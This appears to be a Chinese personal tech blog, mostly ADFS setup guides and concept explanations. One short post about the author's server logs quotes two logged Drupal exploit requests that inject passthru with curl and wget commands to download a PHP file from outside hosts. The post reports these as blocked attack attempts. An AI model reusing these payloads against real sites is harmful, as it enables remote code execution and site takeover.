電腦掛掉了

使用了8年的notebook終於不行了, 出現問題時曾嘗試買新的螢幕連接線來自己更換, 但螢幕還是依舊白化, 雖然外接螢幕是還能使用但覺得太麻煩, 而且舊電腦效能也變差, 外殼被我拆爛裡面排線也都老化, 不想再浪費錢買新面板來試, 最後只能放棄

從 Web Log 學習系統漏洞 45

似乎又是利用 Drupal 的漏洞作攻擊, 不過這次多了一堆看不懂的鬼東西
其中有幾段會連到伊朗的網站下載東西

216.194.173.143 - - [22/Jul/2019:11:17:10 +0800] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-O+sites/default/files/style.php+'http://www.phpro.ir/wp-includes/widgets/style.aff' HTTP/1.1" 403 209

216.194.173.143 - - [22/Jul/2019:11:17:16 +0800] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20http://wordpress.com.djcaa.org/style.php%20%7C%20wget%20http://wordpress.com.djcaa.org/style.php HTTP/1.1" 403 209

下載回來的檔案內容如同 log 中帶有 echo 指令後面接的文字所解碼後的鬼東西
(以base64加密的php/gif檔??)

伊朗的網站?

在ADFS測試Web應用程式網站時遇到的幾個問題

在 ADFS所有宣告規則設定好, 測試Web應用程式網站時遇到的幾個問題, 找了很久問題在哪沒找到, 再上估狗詢問大神, 後來系統全部重置再重新安裝設定 ADFS就好了??🤣

1. 使用非 Web Server主機的瀏覽器出現的網頁問題, 應用程式發生伺服器錯誤

w-studio.idv.tw

2. 使用 Web Server主機的瀏覽器查看網頁, 依照畫面所述修改原始碼還是會出現錯誤

設定宣告特定群組才能存取Web應用程式

1. 開啟 ADFS控制台, 在信賴憑證者信任新增一個宣告規則

w-studio.idv.tw

2. 宣告規則範本選擇傳遞或篩選傳入宣告

安裝、設定及測試不同網域的ADFS同盟伺服器

1. 開啟 AD-2主機的 DNS管理員, 新增主機(A或AAAA)

2. 名稱輸入 adfs, 並輸入 AD-2的 IP

關於主領域探索(Home Realm Discovery)

在 ADFS中主領域探索(Home Realm Discovery, HRD)是一個用於識別並確定用戶的身份提供者的機制, 當用戶試圖訪問受保護的資源時, HRD的主要任務是確定用戶應該通過哪個宣告提供者進行身份驗證

主領域探索的功能

1. 識別用戶的宣告提供者: 當用戶試圖存取受保護的應用程式或資源時, HRD根據用戶的屬性(例如用戶名、電子郵件域名等)來確定用戶應該使用哪個宣告提供者進行身份驗證

2. 重導向到正確的宣告提供者: 一旦確定了適當的宣告提供者, HRD將用戶重導向到該宣告提供者的登錄頁面以進行身份驗證

3. 支持多租戶和跨組織同盟: 在多租戶環境中, HRD能夠根據用戶所屬的組織或域名來動態決定適當的宣告提供者, 支援不同組織之間的身份同盟

主領域探索的工作流程

1. 用戶存取受保護資源: 用戶嘗試存取一個受 ADFS保護的應用程式或服務

2. 發送身份驗證請求: 該請求被轉發到 ADFS伺服器, 伺服器需要確定用戶的宣告提供者

3. 啟動主領域探索: ADFS啟動 HRD過程, 根據請求中的信息(如電子郵件地址、用戶名或其他屬性)來識別用戶的主領域, 例如用戶的電子郵件地址是 user@wey.com時, HRD將識別出 "wey.com" 並查找與該域名關聯的宣告提供者w-studio.idv.tw

4. 選擇身份提供者: 根據 HRD的結果, ADFS決定將用戶重定向到特定的宣告提供者進行身份驗證

5. 重導向和身份驗證: 用戶被重導向到相應的宣告提供者完成身份驗證過程, 一旦身份驗證成功, 宣告提供者生成一個安全權杖, 並將其傳回給 ADFS

6. 授權存取: ADFS接收並驗證權杖, 然後根據設定的授權規則決定是否授予用戶對資源的存取權限

w-studio.idv.tw

設定主領域探索

在 ADFS中設定主領域探索通常涉及以下步驟:

1. 設定信賴憑證者信任(Relying Party Trust): 為受保護的應用程式設定信賴憑證者信任

2. 設定宣告提供者信任(Claims Provider Trust): 新增和設定不同的宣告提供者信任

3. 定義主領域探索原則: 設定 HRD原則, 定義如何根據用戶屬性來選擇宣告提供者

4. 用戶體驗優化: 可以設計一個 HRD頁面, 允許用戶手動選擇他們的宣告提供者或根據過去的選擇自動記住用戶的偏好

幾個宣告規則範本簡單說明

在單一組織的 ADFS部署中, 可能只需要提供 ADFS從宣告中收集並呈現給 Web伺服器的使用者或群組名稱等簡單資訊, 在企業對企業時, 可能必須設定更複雜的宣告規則來定義廣泛不同的系統之間的使用者授權, 宣告規則定義帳戶夥伴(宣告提供者)如何建立宣告以及資源夥伴(信賴憑證者)如何使用宣告

w-studio.idv.tw

1. 以宣告方式傳送 LDAP屬性: 當在 LDAP屬性中選擇特定屬性來輸入宣告時使用此範本, 可以將多個 LDAP屬性設定為從此範本建立的單一宣告規則中的單獨宣告

2. 以宣告方式傳送群組成員資格: 使用此範本傳送特定的宣告類型和基於使用者的 ADDS安全性群組成員身分的關聯宣告值w-studio.idv.tw

3. 傳輸傳入宣告: 使用此範本可將宣告提供者屬性中的屬性值對應到信賴憑證者屬性中的不同值

4. 傳遞或篩選傳入宣告: 使用此範本可以向信賴憑證者提交哪些宣告設定附加限制, 例如想要使用電子郵件地址作為宣告, 但僅當電子郵件地址的網域尾碼為 domain.com 時才轉發該電子郵件地址

5. 傳送使用自訂規則的宣告: 如果沒有內建宣告規則範本提供所需的功能, 可以使用 ADFS宣告規則語言建立更複雜的規則

(6. 根據傳入的宣告允許或拒絕使用者: 只有在信賴憑證者信任上設定發布授權規則或委派授權規則時此範本才可用)

什麼是帳戶伙伴(Account Partner)和資源伙伴(Resource Partner)

ADFS中的帳戶夥伴(Account Partner)和資源夥伴(Resource Partner)設定具有特定的意義和應用, 這些設定主要用於實現跨企業的身份同盟, 確保企業之間能夠安全地共享和存取彼此的資源

帳戶夥伴(Account Partner)

在B2B環境中, 帳戶夥伴是負責管理和驗證其用戶身份的組織, 組織持有用戶帳戶資料, 負責對這些用戶進行身份驗證並生成身份宣告w-studio.idv.tw

帳戶夥伴的角色與責任:

1. 宣告提供者(Claims Provider): 帳戶夥伴作為宣告提供者, 對其用戶進行身份驗證, 並生成安全權杖(例如SAML權杖)

2. 用戶管理: 管理組織內部的用戶信息, 如用戶名、密碼及其他身份屬性

3. 同盟信任: 與其他組織(資源夥伴)建立信任關係, 讓資源夥伴信任帳戶夥伴的身份驗證結果

資源夥伴(Resource Partner)

資源夥伴是提供應用程式或服務的組織, 組織信任帳戶夥伴進行的身份驗證, 並根據這些驗證結果授予或拒絕對其資源的存取

資源夥伴的角色與責任:

1. 信賴憑證者(Relying Party): 資源夥伴提供應用程式或服務, 並依賴帳戶夥伴的身份驗證結果

2. 權杖接收: 接收並驗證來自帳戶夥伴的安全權杖, 並基於權杖中的信息授予或拒絕存取權限

3. 資源保護: 確保只有經過授權的用戶可以存取受保護資源

帳戶夥伴和資源夥伴之間的互動:

1. 身份驗證請求: 帳戶夥伴的用戶試圖存取資源夥伴受保護的應用程式或服務

2. 重導向到宣告提供者: 資源夥伴將身份驗證請求重導向到帳戶夥伴的 ADFS進行身份驗證

3. 身份驗證: 帳戶夥伴的 ADFS對用戶進行身份驗證, 並生成包含用戶身份信息的安全權杖

4. 安全權杖傳遞: 帳戶夥伴的 ADFS將安全權杖傳遞給用戶, 用戶再將權杖提交給資源夥伴的ADFSw-studio.idv.tw

5. 權杖驗證: 資源夥伴的 ADFS驗證安全權杖的有效性, 並基於權杖中的信息授予或拒絕對應用程式或服務的存取

設定信賴憑證者信任之宣告發行原則

1. 在設定好信賴憑證者信任之後, 接著設定宣告發行原則

2. 點擊剛剛設定好的信賴憑證者信任, 跳出的屬性畫面測試信賴憑證者的同盟中繼資料

w-studio.idv.tw

設定信賴憑證者信任

1. 在 AD-1開啟 ADFS控制台, 左邊項目中信賴憑證者信任按右鍵選擇新增信賴憑證者信任

w-studio.idv.tw

2. 開始新增信賴憑證者信任, 選擇宣告感知

設定Windows Identity Foundation(WIF)來信任傳入的宣告

1. 在 Web Server主機開啟 Windows Identity Foundation Federation Utility(WIF)

2. 應用程式設定位置選擇在預先設定好的目錄中的 web.config, 應用程式URI輸入本次設定好的網站網址

w-studio.idv.tw

安裝ADFS (Active Directory Federation Services)

1. 在 AD-1以系統管理員身分開啟Powershell, 輸入 Add-KdsRootKey –EffectiveTime ((Get-Date).AddHours(-10)), 此指令建立 Microsoft群組金鑰分發服務根金鑰, 以便為稍後使用的帳號產生群組託管服務帳號(gMSA)密碼, 且收到一個全域唯一識別碼(GUID)作為對此指令的回應

若無預先執行上面指令, 則在 ADFS安裝完後設定時會出現錯誤而無法繼續

2. 在 AD-1開啟新增角色及功能

w-studio.idv.tw

什麼是信賴憑證者信任(Relying Party Trust)？

在ADFS中信賴憑證者信任(Relying Party Trust)是一種信任關係, 指 ADFS與一個應用程式或服務(信賴憑證者, Relying Party)之間的信任設定, 這種信任關係允許 ADFS將經過處理的宣告(包含用戶身份信息和屬性)發送給信賴憑證者, 以便該應用程式或服務根據這些宣告來進行授權決策w-studio.idv.tw

信賴憑證者信任的作用:

。授權決策: 信賴憑證者根據從 ADFS接收的宣告進行授權決策, 決定用戶是否可以存取特定資源或功能

。安全通信: 確保 ADFS和信賴憑證者之間的通信安全, 使用憑證來簽署和加密宣告, 防止篡改和未經授權的存取

。宣告轉換: ADFS可以根據特定的宣告規則將原始宣告進行轉換或過濾, 確保信賴憑證者接收到的是其需要的格式和內容

信賴憑證者信任的設定:

1. 新增信賴憑證者信任: 在 ADFS控制台中新增信賴憑證者信任, 指定應用程式或服務的元數據metadata(通常是URL格式的元數據檔案)w-studio.idv.tw

2. 設定信任關係: 設定與信賴憑證者之間的信任關係, 包括憑證驗證、宣告規則和發行策略等

3. 憑證驗證: 確認並設定用於簽署和加密宣告的憑證, 以確保宣告的安全性和完整性

信賴憑證者信任的流程:

1. 用戶請求存取應用程式

2. 信賴憑證者重導向到 ADFS進行身份驗證

3. ADFS驗證用戶的身份, 並根據設定的宣告規則生成包含用戶身份信息的宣告

4. ADFS將生成的宣告以安全的方式發送給信賴憑證者

5. 信賴憑證者根據接收到的宣告進行授權決策, 決定用戶的存取權限

什麼是宣告提供者信任(Claims Provider Trust)？

在 ADFS中宣告提供者信任(Claims Provider Trust)是指 ADFS與另一個身份提供者(通常是另一個 ADFS伺服器或其他身份提供系統)之間建立的信任關係, 這種信任關係允許 ADFS從該身份提供者接收並接受用戶身份宣告, 進而用於進一步的身份驗證和授權w-studio.idv.tw

宣告提供者信任的作用:

。身份同盟(Federation): 宣告提供者信任使得不同組織之間可以互相信任對方的身份提供者, 實現跨組織的身份同盟和單點登入(SSO)

。接受外部宣告: ADFS可以從信任的宣告提供者接收用戶的身份宣告, 這些宣告可以包括用戶的身份信息、屬性和角色等w-studio.idv.tw

。轉換和發行宣告: 接收到宣告後, ADFS可以根據定義的規則對宣告進行轉換, 並將轉換後的宣告發送給信賴憑證者(Relying Party)

宣告提供者信任的設定:

1. 新增宣告提供者信任: 在 ADFS控制台中, 新增宣告提供者信任, 指定身份提供者的元數據metadata(通常是URL格式的元數據檔案)w-studio.idv.tw

2. 設定信任關係: 設定與宣告提供者之間的信任關係, 這包括憑證驗證、宣告規則和轉換規則等

3. 憑證驗證: 確認並設定用於簽署和加密宣告的憑證以確保宣告的安全性和完整性

宣告提供者信任的流程:

1. 用戶從信任的宣告提供者(如另一個 ADFS伺服器)請求身份驗證

2. 宣告提供者對用戶進行身份驗證, 並生成包含用戶身份信息的安全宣告

3. ADFS從宣告提供者接收安全宣告, 並根據設定的宣告規則進行處理和轉換

4. ADFS將處理後的宣告發送給信賴憑證者, 信賴憑證者根據這些宣告進行授權決策

什麼是ADFS宣告(Claims)及宣告規則(Claims Rules)

ADFS宣告(Claims)提供 ADFS部署中宣告提供者和信賴憑證者角色之間的連結, ADFS宣告是受信任實體(例如宣告提供者)對特定主體(例如使用者)所做的宣告, 宣告提供者建立宣告, 信賴憑證者使用宣告,  ADFS宣告為宣告提供者提供了一種標準來提供有關其組織中使用者的特定資訊,  ADFS宣告還為信賴憑證者提供了一種方法來定義他們提供應用程式存取所需的資訊, 宣告是以安全權杖(Security Token)的形式傳輸, 並且這些權杖是用於身份驗證和授權過程中的關鍵組成部分w-studio.idv.tw

試作ADFS前的準備 - 5.設定ADFS的DNS A記錄

1. 開啟 AD-1的 DNS管理員, 在正向對應區域的主網域中按右鍵, 選擇新增主機(A或AAAA)

2. 新增 adfs名稱, IP位址填入 AD-1的 IP位址

3. 完成新增主機 A記錄

試作ADFS前的準備 - 4.設定Web Server的憑證

1. 開啟 IIS Web Server, 在首頁畫面中點擊伺服器憑證

w-studio.idv.tw

2. 右邊動作中, 點擊建立網域憑證

試作ADFS前的準備 - 3.設定受信任的根憑證授權單位

1. 首先對 AD-1 及 AD-2 互相複製對方的根憑證到自己主機中

2. 開啟 AD-1的群組原則管理, 展開樹系>網域>wey.com, 然後在 Default Domain Policy項目處按右鍵, 選擇編輯

3. 接著開啟的群組原則管理編輯器, 展開電腦設定>原則>Windows設定>安全性設定>公開金鑰原則, 選擇受信任的根憑證授權單位, 按右鍵選擇匯入

w-studio.idv.tw

規劃高可用性的ADFS

在規劃高可用性的 ADFS部署時有許多關鍵因素需要考慮, 以確保系統的穩定性、可擴展性和容錯能力, 以下是一些重要的考量事項:

1. 伺服器陣列

。ADFS 伺服器陣列:

--部署多台 ADFS伺服器組成伺服器陣列, 確保即使某台伺服器故障其他伺服器可以接管工作, 避免單點故障w-studio.idv.tw

--使用網路負載平衡(NLB)或硬體負載平衡器來分配流量, 確保所有 ADFS伺服器負載均衡

。Web Application Proxy(WAP)陣列:

--部署多台 WAP伺服器以確保外部用戶的高可用性

--使用NLB或硬體負載平衡器來分配外部流量

2. 負載平衡(NLB)

。設定內部負載平衡, 以分配來自內部應用程式的身份驗證請求

。設定外部負載平衡, 以分配來自外部用戶的請求, 這通常由 WAP伺服器處理

同盟伺服器的角色

在 ADFS同盟伺服器中扮演著三個主要角色: 宣告提供者、信賴憑證者以及同盟服務代理, 這些角色各自有不同的功能和用途:

1. 宣告提供者(Claims Provider): 宣告提供者負責驗證用戶的身份並提供宣告, 這些宣告包含有關用戶的身份信息和屬性, 如用戶名、角色和其他屬性w-studio.idv.tw

。用途:

--當用戶嘗試登入並存取應用程式或服務時, 宣告提供者會從身份儲存(如Active Directory或其他目錄服務)中獲取用戶信息

--宣告提供者會生成包含這些信息的宣告, 並將它們傳遞給信賴憑證者(Relying Party), 以便進行進一步的處理和授權決策

2. 信賴憑證者(Relying Party): 信賴憑證者是信任宣告提供者所提供的宣告的應用程式或服務, 這些應用程式或服務使用這些宣告來決定是否授予用戶存取權限

。用途:

--當用戶嘗試存取信賴憑證者應用程式時, 信賴憑證者會檢查來自宣告提供者的宣告並根據這些宣告來決定用戶的存取權限

--信賴憑證者會定義並管理基於宣告的授權規則以控制用戶能夠執行的操作

3. 同盟服務代理(Federation Service Proxy): 同盟服務代理(也稱為 Web Application Proxy)是位於網路邊界的伺服器, 它充當內部 ADFS伺服器與外部用戶之間的中介, 提供對內部資源的安全存取

。用途:

--同盟服務代理負責轉發來自外部用戶的身份驗證請求給內部的 ADFS伺服器, 並將 ADFS伺服器的回應傳遞回外部用戶w-studio.idv.tw

--提供了一層額外的安全性, 保護內部 ADFS伺服器免受直接外部存取, 同時允許外部用戶進行身份驗證和存取內部資源

建立ADFS使用的憑證 - 2.利用IIS建立

另一種建立 ADFS使用的憑證是利用 IIS 來建立, 不過要先建立 CA

1. 開啟 IIS, 點擊在首頁中的「伺服器憑證」項目

w-studio.idv.tw

2. 在右方動作處, 點擊建立網域憑證

建立ADFS使用的憑證 - 1.利用CA建立

在操作 ADFS時, 需要先建立一組憑證供其使用, 以下是利用 CA來建立:

1. 開啟CA憑證授權單位(certsrv)w-studio.idv.tw

2. 在憑證範本按滑鼠右鍵, 按下管理

關於ADFS的憑證需求

在 ADFS中憑證是非常重要的, 它們用於保證通信的安全性、資料的完整性和身份的可信性, 正確設定和管理 ADFS中的憑證是確保身份同盟安全和有效運行的關鍵步驟, 服務通訊憑證保護通信, 權杖簽署憑證確保權杖的完整性, 權杖解密憑證則允許 ADFS解密接收到的權杖, 每種憑證都有其特定的需求和配置要求

ADFS的需求

成功部署ADFS(Active Directory Federation Services)需要一系列關鍵的基礎架構組件和設定:

1. Active Directory Domain Services (ADDS)

。作用: ADDS提供用戶和電腦帳戶的身份驗證和授權服務, 是 ADFS用來儲存和管理用戶身份資訊的基礎

。設定: 需要一個或多個 Active Directory網域控制站, 並確保它們正常運行和同步

2. DNS伺服器w-studio.idv.tw

。作用: DNS負責將網域名解析為IP地址, 使網路資源可被存取, 對於 ADFS, DNS用於解析 ADFS伺服器和服務端點

。設定: 需要設定 DNS條件轉寄(Conditional Forwarders)來解決不同網域之間的名稱解析問題, 此外應設定 ADFS服務名稱的 A記錄或 CNAME記錄

3. ADFS伺服器

。作用: ADFS伺服器是提供身份同盟和單點登錄(SSO)功能的核心

。設定: 安裝和設定 ADFS角色, 並進行必要的信任關係和宣告規則設定

ADFS元件說明

元件	作用
同盟伺服器(Federation server)	同盟伺服器發布、管理和驗證涉及身分聲明的請求, ADFS都需要每個參與者至少有一個同盟身分驗證服務
同盟伺服器代理(Federation server proxy) Web應用程式代理(Web Application Proxy)	同盟伺服器代理是一個選擇元件, 通常部署在外圍網路中, 它不會為 ADFS部署增加任何功能, 但部署它是為了為從網際網路連到同盟伺服器的連接提供一層安全性, 在 Windows Server 2016 中, 同盟伺服器代理功能是 Web應用程式代理的一部分
宣告(Claim)	宣告是由可信任實體針對某個物件(例如使用者)所做的聲明, 宣告可以包括用戶的姓名、職位或身份驗證時可能使用的任何其他因素w-studio.idv.tw
宣告規則(Claim Rule)	宣告規則決定同盟伺服器如何處理宣告
屬性存放區(Attribute Store)	預設使用 ADDS作為通用屬性儲存, 因為同盟伺服器必須安裝在加入網域的伺服器上
宣告提供者(Claims Providers)	宣告提供者是發出聲明並對使用者進行身份驗證的伺服器, 宣告提供者充當 ADFS身份驗證和授權過程的一側, 宣告提供者管理使用者身份驗證然後發布使用者向信賴憑證者提出的宣告
信賴憑證者(Relying Parties)	信賴憑證者是應用程式所在的一方, 它充當 ADFS身份驗證和授權過程的另一方, 信賴憑證者是一種 Web服務, 它使用來自宣告提供者的宣告, 信賴憑證者伺服器必須安裝 WIF 或使用 ADFS 1.0 宣告感知代理
宣告提供者信任(Claim Provider Trust)	宣告提供者信任包含定義規則的設定資料, 在這些規則下用戶端可以向宣告提供者請求宣告並隨後將其提交給信賴憑證者, 信任由各種識別碼組成, 例如名稱、群組和規則
信賴憑證者信任(Relying Party Trust)	信賴憑證者信任包含 ADFS設定資料, 用於向信賴憑證者提供有關使用者或用戶端的宣告, 它包含了各種身分識別, 例如名稱、群組和規則w-studio.idv.tw
憑證(Certificates)	ADFS 在透過 SSL 進行通訊時或作為權杖發布程序、權杖接收程序和 metadata發布過程的一部分使用數位憑證, 數位憑證也用於權杖簽章
端點(Endpoints)	端點是 Windows Communication Foundation 機制, 支援存取 ADFS 技術, 包括權杖發布和 metadata 發布, ADFS同時負責特定功能的內建端點

 

試作ADFS前的準備-2.設定條件轉寄

在進行 ADFS前的準備工作之一, 就是將不同網域的組織的彼此設定條件轉寄, 為了確保不同網域間的 ADFS伺服器能夠相互通信進行正確的名稱解析, 從而實現身份同盟的功能: 

名稱解析:

。跨域通信: 兩個不同網域的 ADFS伺服器需要相互通信以驗證身份和交換權杖, DNS條件轉寄允許一個網域中的 DNS伺服器查詢另一個網域中的 DNS記錄, 從而實現跨域的名稱解析

。可靠性: 通過條件轉寄每個網域的 DNS伺服器能夠直接查詢對方網域中的記錄, 而不是依賴公共 DNS或多層 DNS查詢, 提高了名稱解析的速度和可靠性

簡化管理:

。集中控制: 通過在 DNS中設置條件轉寄, 可以集中控制名稱解析設定, 避免在每台伺服器上進行單獨設定w-studio.idv.tw

。易於維護: 當網域間的資源或 IP地址變更時, 只需要更新 DNS伺服器中的條件轉寄設定而不需要逐個更新每台伺服器

安全性:

。限制查詢範圍: 條件轉寄使得 DNS查詢僅限於特定網域, 這有助於防止不必要的 DNS流量和潛在的安全風險

。防止DNS偽造: 直接指定目標 DNS伺服器減少了查詢過程中的中間環節, 降低了 DNS偽造攻擊的風險

1. 開啟 AD-1主機的 DNS管理員, 在條件式轉寄站新增一筆 AD-2的網域及 IP, 並記得勾選在AD中儲存此條件轉寄站, 複寫到樹系中的所有 DNS

2. 完成條件轉寄設定w-studio.idv.tw

關於Windows Identity Foundation (WIF)軟體

Windows Identity Foundation(WIF)軟體必須在信賴憑證者伺服器(Relying Parties Server)上安裝, 就是本次試做的 Web Server上, 用來製作宣告提供者的宣告, 要重新建立教材相同環境還真不容易, 光是找這個軟體就花了不少時間w-studio.idv.tw

1. 雖然 Windows Server 2016 內有這個 Windows Identity Foundation(WIF)功能安裝, 但實際安裝下去卻沒有完整軟體, 也就是無法使用, 不過要安裝 Windows Identity Foundation SDK之前還是須在新增角色與功能中勾選安裝這個東西才能順利安裝

2. 到微軟官網去搜尋下載, 但這個是 3.5版, 我們需 4.0版

試做ADFS前的準備-1

本次試做 ADFS 準備至少三部主機如下:

為利於分辨將相同網域的 ADDS/DC標為 AD-1, 不同網域的 ADDS/DC標為 AD-2

這兩部 ADDS/DC預先裝好 DNS Server及設定, ADCS 安裝並設定好根憑證, 於事後再安裝 ADFS 及設定, Web Server安裝後先不設定, 並安裝 Windows Identity Foundation(WIF)軟體

ADFS如何在B2B同盟中啟用SSO

在 B2B情況下一個企業需要存取另一個企業的應用程式或服務可以管理自己的使用者帳戶並定義自己的身份驗證機制, 另一個企業可以定義向組織外部的使用者公開哪些應用程式和服務以及它將接受哪些聲明來提供對應用程式的存取, 為了允許在這種情況下共享應用程式或服務, 企業必須建立同盟信任然後定義它們之間交換宣告的規則w-studio.idv.tw

ADFS如何在一個單一組織中啟用SSO

在單一組織中, 可以在下列情況下使用 ADFS啟用 SSO:

。應用程式可能不在基於 Windows的伺服器或任何支援 ADDS驗證的伺服器上執行, 或者它們可能在運行 Windows Server但未加入網域的伺服器上執行, 應用程式可能需要 SAML 或 Web服務進行身份驗證和授權w-studio.idv.tw

。在多個網域和樹系時, 多個樹系中的使用者可能需要存取相同的應用程式

。辦公室外部的使用者可能需要存取內部伺服器上執行的應用程式, 外部使用者可能從不屬於內部網域的電腦登入應用程式

Web Service(Web服務)

Web服務包含一組用於建立連接的應用程式和服務的規範, 其功能和介面透過 Web技術標準(例如 XML、簡單物件存取協定(SOAP)、Web服務描述語言(WSDL)、HTTP和HTTPS)向使用者公開, 使用 Web服務建立 Web應用程式的目標是簡化跨多個開發平台、技術和網路的應用程式的互通性w-studio.idv.tw

為了增強互通性, Web服務由 W3C及 OASIS定義:

。大多數 Web服務使用 XML透過 HTTP和 HTTPS傳輸資料, 透過 XML開發人員可以建立自己的客製化標籤, 從而促進應用程式和組織之間資料的定義、傳輸、驗證和解釋

。Web服務透過 SOAP協定向 Web使用者公開有用的功能, SOAP是定義訊息的 XML格式的規範, 描述有效的 XML文件的外觀

。Web服務提供了一種足夠詳細地描述其介面的方法, 以允許使用者建立用戶端應用程式來與服務進行通訊, 此描述通常在 WSDL的 XML文件中提供, 它描述一組 SOAP訊息以及如何交換這些訊息w-studio.idv.tw

。註冊 Web服務以便用戶可以透過通用描述、發現和整合(Universal Description, Discovery, and Integration, UDDI)輕鬆找到它們, UDDI目錄條目是一個 XML文件, 用於描述業務及其提供的服務

Web Service

什麼是基於宣告的身份(Claims-based Identity)及基於宣告的驗證(Claims-based Authentication)

在ADFS的環境下, 基於宣告的身份(Claims-based Identity) 和基於宣告的驗證(Claims-based Authentication)是核心概念, 它們是用來描述身份驗證和授權的方法:

基於宣告的身份(Claims-based Identity)

在基於宣告的身份模型中, 身份不是直接給定的而是通過"宣告"來描述的, 這些宣告是關於用戶的信息, 如他們的名稱、電子郵件地址、角色、許可權等w-studio.idv.tw

在ADFS中, 當用戶嘗試訪問某個應用程式或資源時, ADFS會發出一個或多個宣告給該應用程式, 這些宣告包含了有關用戶身份和許可權的信息, 這些宣告可以被用來決定用戶是否有權訪問該應用程式以及他們可以執行什麼操作

例如一個身份宣告可能是: "我是John, 在這個組織中的角色是管理員, 我有權訪問此資源"

基於宣告的驗證(Claims-based Authentication)

在基於宣告的驗證模型中, 身份驗證的過程是基於宣告的, 當用戶嘗試登入或訪問某個應用程式時, 他們會提交一些宣告而不僅僅是帳戶名稱和密碼w-studio.idv.tw

在ADFS中, 基於宣告的驗證涉及以下步驟:

1. 用戶登入: 用戶提交他們的身份信息, 如帳戶名稱和密碼

2. 宣告的發出: ADFS驗證用戶的身份然後發出一個或多個宣告, 這些宣告包含了用戶的身份和相關的角色或許可權信息w-studio.idv.tw

3. 宣告的驗證: 應用程式或資源使用這些宣告來驗證用戶的身份和授予許可權, 以確定用戶是否有權訪問該資源

什麼是身份同盟(Identity Federation)

在 Windows Server中, 身份同盟(Identity Federation)是一種身份和身份驗證的解決方案, 它允許不同的組織或服務提供者在彼此之間建立信任關係, 以便共享身份和授權資訊, 這意味著當用戶在一個組織或服務中進行身份驗證後, 他們可以使用這個身份在另一個組織或服務中存取資源而不需要重新驗證, 它提供了一種強大且靈活的方式來管理和驗證用戶的身份和授權

在 ADFS中, 身份同盟通常是透過"信賴關係"(Trust Relationships)來實現的, ADFS可以作為身份提供者(Identity Provider，IdP)和服務提供者(Service Provider，SP)的角色, 當組織之間建立了信賴關係後, ADFS可以作為身份提供者發出和管理權仗(token), 並作為服務提供者驗證這些權仗w-studio.idv.tw

你也可以在單一組織內使用身分同盟, 例如組織可能會規劃部署多個需要身份驗證基於 Web的應用程式, 透過使用 ADFS組織可以為所有應用程式實施一種身份驗證解決方案, 使多個內部網域或樹系中的使用者可以輕鬆存取應用程式, 該解決方案未來可以擴展到外部合作夥伴而無需開發人員更改應用程式

身份同盟的工作原理如下:

1. 建立信任: 首先 ADFS允許組織建立信任關係, 這通常是透過安全的憑證和金鑰來實現

2. 用戶身份驗證: 當用戶在其中一個組織或服務中進行身份驗證時, 這個組織或服務會發出一個安全的憑證或權仗w-studio.idv.tw

3. 權仗的使用: 用戶可以使用這個安全的權仗在其他參與身份同盟的組織或服務中存取資源而不需要再次進行身份驗證

4. 權仗的驗證: 受信任的組織或服務使用這個權仗來驗證用戶的身份和授權, 並授予或拒絕存取資源的權限

什麼是ADFS (Active Directory Federation Services, AD同盟服務)

Active Directory Federation Services (ADFS)是 Windows Server中的一個角色, 它提供了一個身份驗證和授權解決方案, 允許用戶在同一時間內使用單一的身份進行身份驗證, 即所謂的單點登入(Single Sign-On, SSO), ADFS能夠建立信任關係, 並提供安全、整合的身份管理功能, 使組織能夠與其他組織或雲端服務提供者共享資源

簡單解釋, 如下圖常見的第三方網站帳號登入方式, 類似一種 ADFS的應用, 不過 ADFS提供了更多設定及控制